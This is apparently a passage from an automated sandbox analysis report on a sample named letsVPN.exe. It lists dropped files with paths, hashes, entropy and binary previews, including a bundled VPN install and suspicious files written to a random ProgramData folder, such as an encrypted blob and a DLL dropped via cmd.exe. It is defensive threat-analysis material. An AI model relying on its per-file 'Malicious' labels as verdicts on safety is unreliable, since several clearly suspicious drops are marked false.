                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hant\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.963516406614417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:s/wkIv2FCcTWe6lWRhqWOHlLf2KQcvBZ9cPdsmS+ShjmM6IGBkSaq:Sgdsq3b2KZBZO1S+ST6nkvq
                                                                                                                                                                                                  MD5:9CBD975E602B3C1E52CAA03C1EBA9D89
                                                                                                                                                                                                  SHA1:3C32533E5A0221C9A26209ED4936669754BC550C
                                                                                                                                                                                                  SHA-256:3BF3C7DEFE57BF1C243E3424BA02355EE1C0340495ACE2BB082249A3544C1815
                                                                                                                                                                                                  SHA-512:B996ED512BC060AF88E66A6709C92DA9CAF686E4FB9E880139048E9B00A7F3C66A81AA63F589048D1D7EB15DBACAD0BDFEFE247D915C49FBDA322BCDF7F528BB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............" ..0..............7... ...@....... ..............................p.....@.................................`7..O....@...............".. ....`......D7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......P ...............%.......6......................................BSJB............v4.0.30319......l...D...#~......(...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-MO\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.2532181397796105
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kGL8sTxyHu6RjvYDGE97we8obd3qK//mY:kGhVbdD/j
                                                                                                                                                                                                  MD5:AF0601979DB922F247B0831F02566455
                                                                                                                                                                                                  SHA1:7496C66A37E8C8919CACB134777F273594EDC8BE
                                                                                                                                                                                                  SHA-256:652607BE33864DC6B89863B879925FCE2700FDC7A1752AD83485BDB956057814
                                                                                                                                                                                                  SHA-512:4156E43D1F04D66C78B3C80A8264B28061F2C052DC59B81023EC3D7D1E7A723A44F981087C5BE2334F2E03E6F4D51EA4275BFDC3CD25E4057D6A570681E9FFEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!................>.... ........... ....................... ...........@.....................................S.......(............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................ .......H...........(...........P ..p...........................................l..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-SG\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282322783142791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:pdDGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4e+4oq3b2KZBZlnS+ST6nk5:p1GL8sTfLWRO+rUhrI7UT5DXL3qKT/mn
                                                                                                                                                                                                  MD5:DD3AFD8D30B794AFFA6A3AA81C31AFFD
                                                                                                                                                                                                  SHA1:969BC653E46555ED37482B754677A14FE4629E34
                                                                                                                                                                                                  SHA-256:AC606A00D4CAF0C0485EA9B5647F7104F5E0A13C5A88B8253A265B37ABFCFEBF
                                                                                                                                                                                                  SHA-512:880E508630B075B68A2DF05B7CE0BBDB84FEE427BFB65A8237B43FBDA6BB3BE99599021874DB2A17E56EF7F1AB803BA7A385004FB2EC563857DD9CFD1853654D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!..................... ........... ....................... ............@.....................................S.......(............... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H.......p...(...........P .............................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-TW\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.252146524644364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:rGL8sTxyHu6RjvYDGE97we8oRx3qKh/mN:rGhVRxl/+
                                                                                                                                                                                                  MD5:E8F404437EE5E95C3B0971985216778B
                                                                                                                                                                                                  SHA1:F642530C433131B29459EB942C5157FAB7B0B664
                                                                                                                                                                                                  SHA-256:D1EDD534AE26455AEDBC4CB720DEFC618CF669631E6C4EAE66267B91DB625B95
                                                                                                                                                                                                  SHA-512:790F2E5A3D7AE5CA06CAAF58C4CE3EA20A1DE647A537DCCF9235A7BB8841075A5C8FDEB871D495CFC04EEDECD895A8D70B6D2BB24C506143FF6A2CA2775C4599
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!................>.... ........... ....................... .......$....@.....................................S.......(............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................ .......H...........(...........P ..p...........................................l..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\OemVista.inf

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\tap0901.cat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\tap0901.sys

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\tapinstall.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101536
                                                                                                                                                                                                  Entropy (8bit):5.597950959538587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ImYSYxGfIZnRnD6M7EFOUakPhtUn6KXF4O7WfvZt9c:HYFZnRDGdvPXU6K1RW
                                                                                                                                                                                                  MD5:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  SHA1:824F299E8EFD95BECA7DD531A1067BFD5F03B646
                                                                                                                                                                                                  SHA-256:9F45A39015774EEAA2A6218793EDC8E6273EB9F764F3AEDEE5CF9E9CCACDB53F
                                                                                                                                                                                                  SHA-512:FA5CF687EEFD7A85B60C32542F5CB3186E1E835C01063681204B195542105E8718DA2F42F3E1F84DF6B0D49D7EEBAD6CB9855666301E9A1C5573455E25138A8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V........-.....;......<.......+....%......S....%......2....~......,.....)...Rich..........PE..d...<..W..........".................Tv............................................... ....@.......... ..................................................h.......l....D...H...p..........................................................X............................text............................... ..`.data...............................@....pdata..l...........................@..@.rsrc...h...........................@..@.reloc..z....p.......B..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\ndp462-web.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1429344
                                                                                                                                                                                                  Entropy (8bit):7.9320530592846135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:8XWYAlLlqSmtLvUDSRbm4Jah1rVxzY8Ja1xbLAAAOurzXuV1F+eAXvUS1vlPA:8mYAlLfeTUDBzrVxzYTOTOu3Xu5AX/l4
                                                                                                                                                                                                  MD5:B5A67867CDCE86E09E2625A6FA4D5FEA
                                                                                                                                                                                                  SHA1:C42E6ED280290648BBD59F664008852F4CFE4548
                                                                                                                                                                                                  SHA-256:5E21C85034311C51D8B0367A773D475AF2392B3DDCD90676C61697C6B5FD2E6A
                                                                                                                                                                                                  SHA-512:31D7081BFFEEB5F32457096E51A29236306E5D971DE7EDB80A51188BCCDA9B9F17F0C3593D30828FC140B7A023F5B6842BC922F2023C7B8EA3786C2DBEC40472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......So....x...x...x.......x.0.....x......x.xx..<.x.xx....x.xx..~.x......x...y...x.....Q.x.......x.......x.......x.Rich..x.........................PE..L.....\V.........."......l...t...................@..........................@.......)....@...... ..................`z...................................>..........@................................V..@............................................text....j.......l.................. ..`.data...@7...........p..............@....idata..H...........................@..@.boxld01............................@..@.rsrc............ ..................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\uninst.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100646
                                                                                                                                                                                                  Entropy (8bit):7.0924503598442445
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:CXv9qKohEb1guqeLlt3cgATZ+eWeH+BCwVWWBKx1iv:CXsKoGBxJcgGZ+bVWWBm1k
                                                                                                                                                                                                  MD5:BCAE38E6266524A76A57546527DED8CE
                                                                                                                                                                                                  SHA1:79F3040BAEA4C4987CEDB10D30845F70E9D64B0C
                                                                                                                                                                                                  SHA-256:20A400938F7A953DFBA8F89B03555EA3DACFA9D51F71EA15C35258B722BADACA
                                                                                                                                                                                                  SHA-512:35D37CFD07766A76DE222FAC610379D309073065650398EB9A075CF5CAC23EBF3B4599C712ADCB27162CA49F1BF4B0A2249299AC155938E9744F69F44AF1A125
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@..........................@......;.....@..........................................`.................. ............................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\FileSplit.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                  Entropy (8bit):6.901141332438222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZgAswxWzmF+kB7CtT2UiGuxfbM/sR/9UFF+kB7CtT2UiGux:OmWQp7rUCJ4/sR9Uvp7rUC
                                                                                                                                                                                                  MD5:AF4898E8762C23845474DFD6C6B7047E
                                                                                                                                                                                                  SHA1:0FC576A3F2467B47686F71704CA44599CBF96CAB
                                                                                                                                                                                                  SHA-256:7910A6E02CE1FE5B519633EFB910F173CAC517D56665A75B50054E0D9656F554
                                                                                                                                                                                                  SHA-512:7693AA3748A56BE4D1AC75B77F2CB8FE01FE71CC278F67ACF5E4D5E5504C9B94FEED0622BA19C09F376941B2551C7C0251409099FEBB97A9AFA167F8FC42779C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......N.....................4.......... ........@.. ....................... ............@.....................................K.......x1.......................................................................... ............... ..H............text....... ...................... ..`.rsrc...x1.......2..................@..@.reloc..............................@..B........................H........v...1......0....H..X.............................................{....*..s....}.....(.....{.....o.....{.....o....*...}......}.....{...........s....o.....{....o....*....0...........{....(......{....(........r...po....o.......................~.....+............r...p......,......(......+@..X.................~.....+............r...p......,......(........(....-....................~.....+............r...p.......,......(.......{....~.....+....(.....s........s .....8.....u..

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\SK.TXT

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.....q...*.j..|..q..f)...%...._..T02...i...L...59(]Sq`6..7...W.<=.K]:.qX...U......S..(cr".6...$.`......c.q8.-%>^Q1....8.j.|....FA..N...v..w..J...#&...*.......v...>.~..2O.5.rc.-....6.@...............*.eV>. :..Xh.-....+.xP.q.....]., ~1Q...K.'.....4...jO...........j.Q.>m...(..bc.u07.6.^{......A\..*Z.-.\.%.........w..Cs.6.........)O+KQ`.JT..m..k6...#M..r_H........0.%7.\Sa.Oq........J.p....6..H.g.P..&.:..ngm4.+...Z.y%V.O.e...h.h...........Zn......y...I......q.....a.k%.C['..+.>d.e.(.-.l..w..rM.I).E...5.>B/sQHh...f....E>.<..[.x.^..].....FO.Q.9|..`........O...L..l........;.Yx.,.Ft/xW}.V].A..c.......L....8...nt;:d1....z.-.&[..w..jR@~.)...L.D..............e:.+....,.z.(J....1.J..........).Wn....RA`.&.._..PH.....0'n6.2:e...1.J....i.?.KQ.X........D@# ..}&W.D...U.S....WE...Y.6b...*.<w.....M.y..;...v|..1.s...n..7V.........u.4.u.X>=....>..W.u..AZb......UM.&l8..+..K6U..^.6...I.[.:s..............'<J......j.>|r....8Z.w.H4........r...i.(..al...Y..X.i..y.#

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\a

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.016938637522631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:HIFYX//kUg+kmWh0rHN9RSJYFAZU0L5Aflov/PfT:HIFQ//kvhkS56ev/PfT
                                                                                                                                                                                                  MD5:C2071F3E0F4D465E4A109BA7549D5619
                                                                                                                                                                                                  SHA1:0ACDE6A36599862CAEADE3E15AD6644D15520547
                                                                                                                                                                                                  SHA-256:9941DE185F7AB38CE773D41DC444FC886F8EB135A1BE5EB255DC0956DA7D1AEF
                                                                                                                                                                                                  SHA-512:D17116206B49A2D255BEB052D06997E149C5537B6DAB6654D6814325A4D20EA19EA7FC37308139FF719E22E81D75646C91523485A37BCABB8B00DD74C5DC2639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.M.............M.............M........ y...T$..B..J.3................M..7....M..x......M............T$..B..J.3......P....J....M.......M...x.....T$..B..J.3..q..............M...O...M.............T$..B..J.3..@..............M.....P..h.O..j.h.....E......P.....T$..B..J.3................M.....PP..h.O..j.h.....E......P.J....M............M... .....w...T$..B..J.3......0....M....M...(...M...-...T$..B..J.3..w....J.3..m....d.........M..-...M...(...M..(...T$..B..J.3..:....J.3..0..............M..e-...M..(...M..E(...T$..B..J.3.......J.3.................P....)...M..ix....D.....-...T$..B...@...3......J.3...........X....M...v...T$..B..J.3......J.3......D....+....M..0)....|....fF...T$..B...D...3..O....J.3..E....x.........M..S....u........u........u.......T$..B..J.3................M..^,...T$..B..J.3................M...I...M...t......T$..B..J.3......P....a....M..H'...T$..B..J.3......J.3......|....4..........& ...T$..B.......3..`....J.3..V..............M.......T$..B..J.3..3........

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\base.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*!..y!..y!..y(.xy-..y(.hy...y!..y..yN.ey...yN.Qy...yN.PyS..yN.Ty#..yN.`y ..yN.ay ..yN.fy ..yRich!..y................PE..L.../.cg...........!................M.........................................&.......&...@.....................................T....0#..0...................p#..U......................................@............................................text...n........................... ..`.rdata..............................@..@.data...<x.... ....... .............@....rsrc....0...0#..2...j".............@..@.reloc..JD...p#..F....".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\msvcp120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\msvcr120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
